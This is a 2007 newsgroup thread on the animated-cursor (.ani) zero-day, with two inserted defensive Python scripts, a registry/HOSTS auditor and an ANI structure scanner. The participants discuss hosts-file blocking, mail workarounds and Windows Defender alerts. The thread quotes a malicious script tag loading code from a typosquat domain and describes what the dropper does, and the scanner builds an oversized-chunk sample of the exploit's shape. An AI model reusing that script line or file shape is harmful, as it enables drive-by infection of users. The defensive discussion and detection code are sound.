MSRC blog on the current 0-day .ani vulnerability

Guest

Bill,

Sorry for the confusion, I am referring to the use of JavaScript in the
proper functioning of "McAfee Site Advisor" redirecting the browser, not the
.ani exploit in question.

?:)
Tim

Bill Sanderson MVP said:
The domains I have seen mentioned at isc.sans.org have been used to
distribute malware before--so they may already be blocked .

I don't believe that JavaScript is involved in this one.

--

Tim Clark said:
Stu,

I use the McAfee Site Advisor [not plus] extension in my Firefox.
Is there a way to test if it will "prevent you from going to any suspect
site unless you decide to override its warning"? I've seen the red flag [icon
bar] but would like to know how to see if it will prompt me before going to a
Really Bad [exploit] site.
Does it use/need JavaScript, as I generally have it turned off or blocked
using the NoScript extension? Does it make a pop up window that says "Are
you sure" or what?

Thanks in Advance,
?:)

Stu said:

For this I use McAfee's Site Advisor plus
which will prevent you from going to any suspect site unless you decide to
override its warning. For me this has worked very well with both IE7 and
Firefox. ...

Stu
 
Anonymous Bob

Bill Sanderson MVP said:
This would be an excellent site to add to a hosts file, to block access.

127.0.0.1 and the site name as below, substituting the obvious.

There are definitely times that using hosts-file based blocking may make
good sense, and this is probably one.

There's a worm based on this exploit now that edits the hosts file:
http://securitywatch.eweek.com/browsers/worm_posing_as_ie_beta_download.html

At the current infection rate, it may be a losing battle to try to add the
sites into the hosts file, though anything is better than nothing.

I read somewhere else (and can't find it now) of a variation that deletes
the hosts file.

Bob Vanderveen
 
Anonymous Bob

[...]
I read somewhere else (and can't find it now) of a variation that deletes
the hosts file.

I found it.<g>

http://www.mnin.org/write/ani-notes.pdf
There are several malicious ANI files in circulation. The one to discuss is
mm.jpg from newasp, but others are likely very similar. Shellcode in mm.jpg
basically resolves kernel32 functions, downloads, and executes xx.exe (from
behavioral analysis). It doesn't do much but delete the system's HOSTS file,
write bdscheca001.dll to %SYSTEM%, and register the DLL as a
ShellExecuteHooks entry.

Bob Vanderveen
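An added example, not from the thread or from any tool mentioned in it: a Python script that audits the two artifacts the mnin note describes, the ShellExecuteHooks key and the HOSTS file. It works offline from a regedit export, so the check can be run against an export pulled from a suspect box. The allowlisted CLSID (the URL Exec Hook in shell32.dll that a stock XP install carries) is an assumption to be confirmed against a known-clean machine; the second CLSID and the DLL path in the constructed sample export are made up to mirror the write-up and are not indicators from any real sample.

```python
"""Audit ShellExecuteHooks registrations and the HOSTS file offline, from a regedit export."""
import os
import sys

# Key the dropped DLL is said to register under. Every DLL listed here is loaded
# into any process that calls ShellExecute, so it is a persistence point worth auditing.
HOOKS_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"

# Assumption: the one hook a stock Windows XP/2003 install carries (URL Exec Hook, shell32.dll).
# Extend this from a known-clean machine of the same build before trusting the result.
KNOWN_HOOKS = {"{AEB6717E-7E19-11D0-97EE-00C04FD91972}"}

# Constructed sample export (what "regedit /e" writes). The second CLSID and the DLL
# path are made up to mirror the write-up above; they are not real indicators.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{AEB6717E-7E19-11d0-97EE-00C04FD91972}"=""
"{00000000-1111-2222-3333-444444444444}"=""

[HKEY_CLASSES_ROOT\CLSID\{00000000-1111-2222-3333-444444444444}\InprocServer32]
@="C:\\WINDOWS\\system32\\bdscheca001.dll"
"ThreadingModel"="Apartment"
"""


def parse_reg_export(text):
    """Parse a .reg export into {KEY_PATH_UPPER: {value_name: value}} (string values only)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].upper()          # registry key names are case-insensitive
            keys[current] = {}
        elif current is not None and "=" in line and not line.startswith(";"):
            name, _, value = line.partition("=")
            name = "(default)" if name == "@" else name.strip('"')
            # .reg files escape backslashes inside quoted strings
            keys[current][name] = value.strip().strip('"').replace("\\\\", "\\")
    return keys


def audit_shell_execute_hooks(keys):
    """Return [(clsid, dll_path)] for every hook CLSID not in KNOWN_HOOKS."""
    findings = []
    for clsid in keys.get(HOOKS_KEY.upper(), {}):
        if not clsid.startswith("{") or clsid.upper() in KNOWN_HOOKS:
            continue
        inproc_key = ("HKEY_CLASSES_ROOT\\CLSID\\" + clsid + "\\InprocServer32").upper()
        inproc = keys.get(inproc_key, {})
        findings.append((clsid, inproc.get("(default)", "<InprocServer32 missing>")))
    return findings


def hosts_file_status(path):
    """The dropper above deletes HOSTS; report whether it is missing, empty, or populated."""
    if not os.path.exists(path):
        return "missing"
    with open(path, errors="replace") as fh:
        entries = [l for l in fh if l.strip() and not l.lstrip().startswith("#")]
    return "empty" if not entries else f"present ({len(entries)} entries)"


if __name__ == "__main__":
    for clsid, dll in audit_shell_execute_hooks(parse_reg_export(SAMPLE_EXPORT)):
        print(f"unexpected ShellExecuteHook {clsid} -> {dll}")
    if sys.platform == "win32":
        hosts = os.path.join(os.environ["SystemRoot"], "System32", "drivers", "etc", "hosts")
        print("HOSTS:", hosts_file_status(hosts))
```

A real "regedit /e" export is UTF-16LE with a BOM, so read it with encoding="utf-16" before passing the text to parse_reg_export. An unknown hook whose InprocServer32 points into %SYSTEM% is not proof of infection by itself, but it is exactly the kind of change the thread was hoping Windows Defender would flag, and it is cheap to confirm by hand.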
 
Bill Sanderson MVP

It is looking to me as though at least the www variant of this particular
domain has been taken down. The other one listed at ISC.SANS.ORG is still
pingable, however.

Thanks.
--
 
Bill Sanderson MVP

Presumably, Windows Defender would say something about that
ShellExecuteHooks registration--and possibly the Hosts file change as well.

I doubt that I'm going to be in a position to test this even though you've
laid it out pretty clearly--but thanks, anyway!

--

 
Guest

Hi Tim

Apologies for the late response to your post - night shift. I meant the Java
2 platform, sorry for the confusion. As for the installation of plus into
Firefox, in my situation I was able to import my IE7 settings to Firefox post
installation using the File>Import wizard. As you step through the wizard you
are given the option (among other things) to import Internet Options, so it
was not necessary for me to specifically install SA plus into Firefox. I have
not been able to find a link specific to a SA plus download for Firefox, but
to allay your concerns the following link provides info in which SA plus has
supported Firefox & AOL since Dec last year. So I am ASSUMING the version
listed on McAfee's download site supports both browsers. It works fine on my
system.

http://www.eweek.com/article2/0,1895,2074714,00.asp

Stu

Tim Clark said:
Interesting Stu,

While waiting for your reply I visited the SiteAdvisor site and could not
find a "Plus" version for Firefox, only for IE. The only version I could
find for Firefox was the free version. Perhaps the SiteAdvisor for IE uses
an ActiveX control to block you before going to an "exploit" site. Since FF
does not use ActiveX this would imply it would not work. [or that I'm just too
blind to find the Plus version for FF, got a link??]

You mention that you have "Java" [I assume you mean JavaScript] turned off .
That seems strange as well, as this newsgroup requires JavaScript [unless of
course you are not using a browser, in which case it would not matter.]

Interesting, verrrrry interesting,
?:)
Tim


Stu said:
Hi Tim

Good question, and one which I have never had the courage to try before I
upgraded to the plus version, although I strongly suspect it would not, which
is probably why you have to pay a few bucks for the extra protection plus
gives you. With plus, if you select a red, amber or untested link you will
automatically be redirected to a McAfee warning page where you can carefully
study the site reports before proceeding further. If you decide not to
proceed then there is a back link button which will return you to the page
you were viewing before. As for Java, it doesn't seem to need it as I've used
it with it turned on and off. In fact, right now I have it off.

Hope this helps.

Stu

 
Guest

Talking of marking your messages "read as plain text", which it seems doesn't
guarantee protection: all the hype seems to centre around OE but I don't
recall any mention of Outlook. Would I be right or wrong in thinking,
therefore, that Outlook is not likely to be affected by this exploit on the
email side of things? Any takers? I have the option set in Outlook anyway
but was just wondering.

Stu


Anonymous Bob said:
Tim Clark said:
Type carefully folks,

this site should be avoided at ALL costs,
I only mention it because of the obvious,

==============
microfsot [dot] com
==============

again, type CAREFULLY!!!

I've read that there are now over a hundred sites spreading the
exploits. There are also many variations. It isn't only .ani files, as the
file extension could be jpeg or others.

The most comprehensive list of sites and file hashes I've seen so far is
here:
http://isc.sans.org/diary.html?storyid=2540

If you use OE under Tools | Options | Read check the box for "Read all
messages in plain text". Please note that this is *not* a total defense as
you can still be infected if you reply to or forward a message.

Be careful out there,
Bob Vanderveen
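An added example, not from the thread or from any vendor mentioned in it: a Python scanner that identifies RIFF/ACON animated cursors by content rather than by extension (so an mm.jpg that is really an .ani is recognised) and flags any anih chunk whose declared size is not the 36 bytes of the ANIHEADER structure. An oversized anih is the shape exploits for advisory 935423 (CVE-2007-0038) take, because user32 copies the chunk into a fixed 36-byte structure using the length the file declares. The sample files are constructed inline and contain no shellcode.

```python
"""Content-based check for animated-cursor (RIFF/ACON) files with an out-of-spec anih chunk."""
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): nine DWORDs; user32 copies anih data into a buffer of this size


def _chunks(data, offset, end):
    """Yield (fourcc, payload_offset, declared_size) for each RIFF chunk in data[offset:end]."""
    while offset + 8 <= end:
        fourcc = data[offset:offset + 4]
        (size,) = struct.unpack_from("<I", data, offset + 4)
        payload = offset + 8
        yield fourcc, payload, size
        if size > end - payload:
            return                            # overrun: nothing past this chunk can be trusted
        offset = payload + size + (size & 1)  # chunk bodies are padded to a word boundary


def scan_ani(data):
    """Return {'is_ani': bool, 'findings': [str]}; findings are suspicious chunks, not a verdict."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return {"is_ani": False, "findings": []}
    (riff_size,) = struct.unpack_from("<I", data, 4)
    findings = []

    def walk(offset, end):
        for fourcc, payload, size in _chunks(data, offset, end):
            if size > end - payload:
                findings.append(f"{fourcc!r} at {payload - 8} declares {size} bytes, {end - payload} remain")
                return
            if fourcc == b"anih" and size != ANIH_SIZE:
                findings.append(f"anih at {payload - 8} is {size} bytes, expected {ANIH_SIZE}")
            elif fourcc == b"LIST" and size >= 4:
                walk(payload + 4, payload + size)  # skip the LIST type fourcc, recurse into sub-chunks

    walk(12, min(len(data), 8 + riff_size))
    return {"is_ani": True, "findings": findings}


# --- constructed samples (not real malware) ------------------------------------------
def _chunk(fourcc, payload):
    return fourcc + struct.pack("<I", len(payload)) + payload + (b"\0" if len(payload) & 1 else b"")


def _riff(*chunks):
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
GOOD_HEADER = struct.pack("<9I", 36, 1, 1, 0, 0, 0, 0, 10, 1)
FRAMES = _chunk(b"LIST", b"fram" + _chunk(b"icon", b"\0" * 22))

BENIGN_ANI = _riff(_chunk(b"anih", GOOD_HEADER), FRAMES)
# A valid first header followed by a second anih that declares 100 bytes: the shape an
# exploit for advisory 935423 takes, whatever the file is named (mm.jpg, for example).
OVERSIZED_ANI = _riff(_chunk(b"anih", GOOD_HEADER), FRAMES, _chunk(b"anih", GOOD_HEADER + b"A" * 64))

if __name__ == "__main__":
    samples = (("benign.ani", BENIGN_ANI), ("mm.jpg", OVERSIZED_ANI), ("real.jpg", b"\xff\xd8\xff\xe0" + b"\0" * 16))
    for name, blob in samples:
        print(name, scan_ani(blob))
```

Because the check is on the RIFF structure and not the name, it can be run over a mail store or web cache as a triage step; a file that is an ANI with a non-36-byte anih, or whose chunk sizes overrun the container, deserves a closer look regardless of what it claims to be.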
 
Guest

I was wondering the exact same thing myself. I'm sure my test would not be so
thorough as yours Bill, but I have just tried editing my hosts file as follows:

1. Adding an entry
2. Deleting an entry
3. Deleting the Hosts File to the recycle bin and restoring again.

WD remained ominously silent throughout.

Stu

 
Anonymous Bob

Stu said:
Talking of marking your messages "read as plain text", which it seems doesn't
guarantee protection: all the hype seems to centre around OE but I don't
recall any mention of Outlook. Would I be right or wrong in thinking,
therefore, that Outlook is not likely to be affected by this exploit on the
email side of things? Any takers? I have the option set in Outlook anyway
but was just wondering.

I think there has been conflicting information regarding this point, so
here's the word directly from Microsoft:
http://www.microsoft.com/technet/security/advisory/935423.mspx
From the Workaround section:
Read e-mail messages in plain text format if you are using Outlook 2002 or a
later version, or Windows Mail to help protect yourself from the HTML e-mail
preview attack vector.
Microsoft Outlook 2002 users who have applied Office XP Service Pack 1 or a
later version can enable this setting and view e-mail messages that are not
digitally signed or e-mail messages that are not encrypted in plain text
only.

Caveat: Reading e-mail in plain text on Windows Vista Mail does not mitigate
attempts to exploit the vulnerability when Forwarding and Replying to mail
sent by an attacker.

Note: Reading e-mail in plain text on Outlook Express does not mitigate
attempts to exploit this vulnerability.

Impact of Workaround: E-mail messages that are viewed in plain text format
will not contain pictures, specialized fonts, animations, or other rich
content. Additionally:

- The changes are applied to the preview pane and to open messages.

- Pictures become attachments so that they are not lost.

- Because the message is still in Rich Text or HTML format in the store, the
object model (custom code solutions) may behave unexpectedly.

Bob Vanderveen
 
Bill Sanderson MVP

I know that in the past, Windows Defender has raised flags about some
changes to the hosts file, but I haven't tracked exactly what.

Your test is worrying, but perhaps not conclusive--I don't know whether it
is possible to distinguish between programmatic manipulation of the file,
and manipulation through the user interface.

All things considered, I think Bob Vanderveen's comments expose the weakness
of the hosts file as a defense against malware already in place. It is
pretty good for keeping novice users away from bad places, but easily
defeated.

--

 
Dave M

...Yes, that would be ominous. My addition to HOSTS using HostsMan was
immediately spotted by Defender and I permitted it. Assuming you have RTP
activated on all items, and with both not yet classified software (HostsMan)
and permitted to run software checked, allowing you to be notified. I also
received a duplicate notification about 30 seconds later from WinPatrol.

--

Regards, Dave

 
Guest

I think I'd expect that Stu - but try this: Use Spybot S&D either to add or
remove its own hosts file. Whichever way you do it, Defender reassuringly
pops up a little flag to ask you to permit or deny the hosts file change.
 
Guest

Bill Sanderson MVP said:
I know that in the past, Windows Defender has raised flags about some
changes to the hosts file, but I haven't tracked exactly what.

Ah... just noticed this - please see my reply to Stu's post, Bill. Changes
made by Spybot to the hosts file do generate Defender alerts - so I assume
Defender would push a flag up if the hosts file were changed by any other
software?
 
Bill Sanderson MVP

I don't know whether the flag is raised because of the content of those
changes (i.e. the sites that Spybot is putting in there are BAD sites)--or
because the change is being made by a program, somehow.



--
 
plun

Bill said:
The domains I have seen mentioned at isc.sans.org have been used to
distribute malware before--so they may already be blocked .

I don't believe that JavaScript is involved in this one.

Hi Bill

Well, JavaScript is indeed involved:

<script src=http://macr.microfsot.com/<removed>.js></script>

http://www.cisrt.org/enblog/read.php?68

But he is scared today and changed it.
http://www.cisrt.org/enblog/read.php?69

But again.... this gang will probably make new variants for spam...

http://www.spamhaus.org/statistics/spammers.lasso

There's also a patch from ZERT.... No. 1 in reverse engineering...
http://zert.isotf.org/advisories/zert-2007-01.htm

F-Secure gave it Radar Alert Level 2 directly

http://www.f-secure.com/v-descs/agent_bky.shtml

regards
plun
 
Bill Sanderson MVP

So it is... That second entry (69) is interesting. I should look up what
actually happened to the earlier worm author referenced.

I have a spam in hand which may well be related to this--it includes a
numeric IP which is located in China--haven't tested beyond that to see what
is there.

--
 
Guest

Thanks for the feedback Alan I`ll try that.

Stu

Alan D said:
I think I'd expect that Stu - but try this: Use Spybot S&D either to add or
remove its own hosts file. Whichever way you do it, Defender reassuringly
pops up a little flag to ask you to permit or deny the hosts file change.
 
Guest

Thanks for the input Dave. I use HostsMan also and just reinstalled WinPatrol.
Reran an edit of my hosts file this time (adding and deleting an entry),
which WinPatrol detected on both occasions but WD did not (all options
selected). Tried deleting and restoring Hosts - neither detected. Now I'm
totally confused and concerned. Interestingly, if you reject the change in
WinPatrol, the hosts file count does not revert to the original count. E.g.
right now I show 16972 MVPS entries. If I delete one entry it shows 16971, BUT
WinPatrol pops up and asks me if I accept the change. In this case I reject,
but HostsMan still shows 16971 entries. One would have thought it would
revert back to 16972. Oh well, it is in Beta so maybe that's the answer.

Stu

 
Tom Emmelot

Hi Plun,

Welcome back, and well documented as usual! ;)

Regards >*< TOM >*<
